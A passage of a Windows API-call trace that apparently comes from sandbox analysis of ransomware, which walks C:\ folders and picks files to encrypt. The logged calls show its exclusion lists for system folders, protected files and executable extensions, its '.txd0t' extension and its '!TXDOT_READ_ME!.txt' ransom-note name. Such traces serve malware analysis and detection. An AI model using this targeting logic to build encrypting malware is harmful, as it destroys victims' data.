ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0087.760] FindClose (in: hFindFile=0xec2430 | out: hFindFile=0xec2430) returned 1 [0087.760] GetProcessHeap () returned 0xe30000 [0087.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed3e88 | out: hHeap=0xe30000) returned 1 [0087.760] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0087.760] StrCmpW (psz1="Boot", psz2=".") returned 1 [0087.760] StrCmpW (psz1="Boot", psz2="..") returned 1 [0087.761] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0087.761] StrCmpW (psz1="bootmgr", psz2=".") returned 1 [0087.761] StrCmpW (psz1="bootmgr", psz2="..") returned 1 [0087.761] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0087.761] StrCmpW (psz1="BOOTNXT", psz2=".") returned 1 [0087.761] StrCmpW (psz1="BOOTNXT", psz2="..") returned 1 [0087.761] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0087.761] StrCmpW (psz1="BOOTSECT.BAK", psz2=".") returned 1 [0087.761] StrCmpW (psz1="BOOTSECT.BAK", psz2="..") returned 1 [0087.761] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0087.761] StrCmpW (psz1="Documents and Settings", psz2=".") returned 1 [0087.761] StrCmpW (psz1="Documents and Settings", psz2="..") returned 1 [0087.761] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0087.761] StrCmpW (psz1="ESD", psz2=".") returned 1 [0087.761] StrCmpW (psz1="ESD", psz2="..") returned 1 [0087.761] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0087.761] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0087.761] StrNCatW (in: psz1="C:\\", psz2="ESD", cchMax=1030 | out: psz1="C:\\ESD") returned="C:\\ESD" [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\system32\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\syswow64\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\system\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\winsxs\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\roaming\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\local\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\locallow\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\all users\\microsoft\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\inetpub\\logs\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\boot\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\perflogs\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\programdata\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\drivers\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\wsus\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\efstmpwp\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\$recycle.bin\\") returned 0x0 [0087.761] StrStrIW (lpFirst="C:\\ESD", lpSrch="crypt_detect") returned 0x0 [0087.762] StrStrIW (lpFirst="C:\\ESD", lpSrch="cryptolocker") returned 0x0 [0087.762] StrStrIW (lpFirst="C:\\ESD", lpSrch="ransomware") returned 0x0 [0087.762] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\WINDOWS") returned 0x0 [0087.762] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\Program Files (x86)") returned 0x0 [0087.762] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\Program Files") returned 0x0 [0087.762] GetProcessHeap () returned 0xe30000 [0087.762] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48e) returned 0xed3e88 [0087.762] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\ESD", cchMax=1038 | out: psz1="C:\\ESD") returned="C:\\ESD" [0087.762] StrNCatW (in: psz1="C:\\ESD", psz2="\\*", cchMax=1038 | out: psz1="C:\\ESD\\*") returned="C:\\ESD\\*" [0087.762] FindFirstFileW (in: lpFileName="C:\\ESD\\*", lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2430 [0087.762] StrCmpW (psz1=".", psz2=".") returned 0 [0087.762] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.762] StrCmpW (psz1="..", psz2=".") returned 1 [0087.762] StrCmpW (psz1="..", psz2="..") returned 0 [0087.762] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0087.762] FindClose (in: hFindFile=0xec2430 | out: hFindFile=0xec2430) returned 1 [0087.762] GetProcessHeap () returned 0xe30000 [0087.762] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed3e88 | out: hHeap=0xe30000) returned 1 [0087.762] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab460c6f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0087.762] StrCmpW (psz1="hiberfil.sys", psz2=".") returned 1 [0087.762] StrCmpW (psz1="hiberfil.sys", psz2="..") returned 1 [0087.762] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0087.762] StrCmpW (psz1="Logs", psz2=".") returned 1 [0087.762] StrCmpW (psz1="Logs", psz2="..") returned 1 [0087.762] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0087.762] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0087.762] StrNCatW (in: psz1="C:\\", psz2="Logs", cchMax=1030 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\system32\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\system\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\local\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\boot\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\perflogs\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\programdata\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\drivers\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\wsus\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\efstmpwp\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="crypt_detect") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="cryptolocker") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="ransomware") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\WINDOWS") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0087.763] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\Program Files") returned 0x0 [0087.763] GetProcessHeap () returned 0xe30000 [0087.763] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x490) returned 0xed3e88 [0087.763] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.763] StrNCatW (in: psz1="C:\\Logs", psz2="\\*", cchMax=1040 | out: psz1="C:\\Logs\\*") returned="C:\\Logs\\*" [0087.763] FindFirstFileW (in: lpFileName="C:\\Logs\\*", lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20b0 [0087.765] StrCmpW (psz1=".", psz2=".") returned 0 [0087.765] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.766] StrCmpW (psz1="..", psz2=".") returned 1 [0087.766] StrCmpW (psz1="..", psz2="..") returned 0 [0087.766] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0087.766] StrCmpW (psz1="Application.evtx", psz2=".") returned 1 [0087.766] StrCmpW (psz1="Application.evtx", psz2="..") returned 1 [0087.766] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.766] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.766] StrNCatW (in: psz1="C:\\Logs\\", psz2="Application.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Application.evtx") returned="C:\\Logs\\Application.evtx" [0087.766] PathFindExtensionW (pszPath="Application.evtx") returned=".evtx" [0087.766] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="bootsect.bak") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="iconcache.db") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="thumbs.db") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2=" ransomware ") returned 1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2=" ransom ") returned 1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="debug.txt") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="boot.ini") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="desktop.ini") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="autorun.inf") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="ntuser.dat") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="ntldr") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="ntdetect.com") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="bootfont.bin") returned -1 [0087.766] StrCmpIW (psz1="Application.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.766] PathFindExtensionW (pszPath="Application.evtx") returned=".evtx" [0087.766] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.766] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0087.770] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.770] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Application.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Application.evtx") returned="\\\\?\\C:\\Logs\\Application.evtx" [0087.770] SetEvent (hEvent=0x3fc) returned 1 [0087.770] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="HardwareEvents.evtx", cAlternateFileName="HARDWA~1.EVT")) returned 1 [0087.770] StrCmpW (psz1="HardwareEvents.evtx", psz2=".") returned 1 [0087.770] StrCmpW (psz1="HardwareEvents.evtx", psz2="..") returned 1 [0087.770] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.770] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.770] StrNCatW (in: psz1="C:\\Logs\\", psz2="HardwareEvents.evtx", cchMax=1040 | out: psz1="C:\\Logs\\HardwareEvents.evtx") returned="C:\\Logs\\HardwareEvents.evtx" [0087.770] PathFindExtensionW (pszPath="HardwareEvents.evtx") returned=".evtx" [0087.770] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.770] StrCmpIW (psz1="HardwareEvents.evtx", psz2="bootsect.bak") returned 1 [0087.770] StrCmpIW (psz1="HardwareEvents.evtx", psz2="iconcache.db") returned -1 [0087.770] StrCmpIW (psz1="HardwareEvents.evtx", psz2="thumbs.db") returned -1 [0087.770] StrCmpIW (psz1="HardwareEvents.evtx", psz2=" ransomware ") returned 1 [0087.770] StrCmpIW (psz1="HardwareEvents.evtx", psz2=" ransom ") returned 1 [0087.770] StrCmpIW (psz1="HardwareEvents.evtx", psz2="debug.txt") returned 1 [0087.771] StrCmpIW (psz1="HardwareEvents.evtx", psz2="boot.ini") returned 1 [0087.771] StrCmpIW (psz1="HardwareEvents.evtx", psz2="desktop.ini") returned 1 [0087.771] StrCmpIW (psz1="HardwareEvents.evtx", psz2="autorun.inf") returned 1 [0087.771] StrCmpIW (psz1="HardwareEvents.evtx", psz2="ntuser.dat") returned -1 [0087.771] StrCmpIW (psz1="HardwareEvents.evtx", psz2="ntldr") returned -1 [0087.771] StrCmpIW (psz1="HardwareEvents.evtx", psz2="ntdetect.com") returned -1 [0087.771] StrCmpIW (psz1="HardwareEvents.evtx", psz2="bootfont.bin") returned 1 [0087.771] StrCmpIW (psz1="HardwareEvents.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.771] PathFindExtensionW (pszPath="HardwareEvents.evtx") returned=".evtx" [0087.771] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.771] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.786] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.786] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\HardwareEvents.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\HardwareEvents.evtx") returned="\\\\?\\C:\\Logs\\HardwareEvents.evtx" [0087.786] SetEvent (hEvent=0x408) returned 1 [0087.786] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0087.786] StrCmpW (psz1="Internet Explorer.evtx", psz2=".") returned 1 [0087.786] StrCmpW (psz1="Internet Explorer.evtx", psz2="..") returned 1 [0087.786] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.786] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.786] StrNCatW (in: psz1="C:\\Logs\\", psz2="Internet Explorer.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Internet Explorer.evtx") returned="C:\\Logs\\Internet Explorer.evtx" [0087.786] PathFindExtensionW (pszPath="Internet Explorer.evtx") returned=".evtx" [0087.786] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.786] StrCmpIW (psz1="Internet Explorer.evtx", psz2="bootsect.bak") returned 1 [0087.786] StrCmpIW (psz1="Internet Explorer.evtx", psz2="iconcache.db") returned 1 [0087.786] StrCmpIW (psz1="Internet Explorer.evtx", psz2="thumbs.db") returned -1 [0087.786] StrCmpIW (psz1="Internet Explorer.evtx", psz2=" ransomware ") returned 1 [0087.786] StrCmpIW (psz1="Internet Explorer.evtx", psz2=" ransom ") returned 1 [0087.786] StrCmpIW (psz1="Internet Explorer.evtx", psz2="debug.txt") returned 1 [0087.786] StrCmpIW (psz1="Internet Explorer.evtx", psz2="boot.ini") returned 1 [0087.786] StrCmpIW (psz1="Internet Explorer.evtx", psz2="desktop.ini") returned 1 [0087.787] StrCmpIW (psz1="Internet Explorer.evtx", psz2="autorun.inf") returned 1 [0087.787] StrCmpIW (psz1="Internet Explorer.evtx", psz2="ntuser.dat") returned -1 [0087.787] StrCmpIW (psz1="Internet Explorer.evtx", psz2="ntldr") returned -1 [0087.787] StrCmpIW (psz1="Internet Explorer.evtx", psz2="ntdetect.com") returned -1 [0087.787] StrCmpIW (psz1="Internet Explorer.evtx", psz2="bootfont.bin") returned 1 [0087.787] StrCmpIW (psz1="Internet Explorer.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.787] PathFindExtensionW (pszPath="Internet Explorer.evtx") returned=".evtx" [0087.787] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.787] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.796] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.796] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Internet Explorer.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Internet Explorer.evtx") returned="\\\\?\\C:\\Logs\\Internet Explorer.evtx" [0087.796] SetEvent (hEvent=0x418) returned 1 [0087.796] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0087.796] StrCmpW (psz1="Key Management Service.evtx", psz2=".") returned 1 [0087.796] StrCmpW (psz1="Key Management Service.evtx", psz2="..") returned 1 [0087.797] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.798] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.798] StrNCatW (in: psz1="C:\\Logs\\", psz2="Key Management Service.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Key Management Service.evtx") returned="C:\\Logs\\Key Management Service.evtx" [0087.798] PathFindExtensionW (pszPath="Key Management Service.evtx") returned=".evtx" [0087.798] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="bootsect.bak") returned 1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="iconcache.db") returned 1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2="thumbs.db") returned -1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2=" ransomware ") returned 1 [0087.798] StrCmpIW (psz1="Key Management Service.evtx", psz2=" ransom ") returned 1 [0087.798] 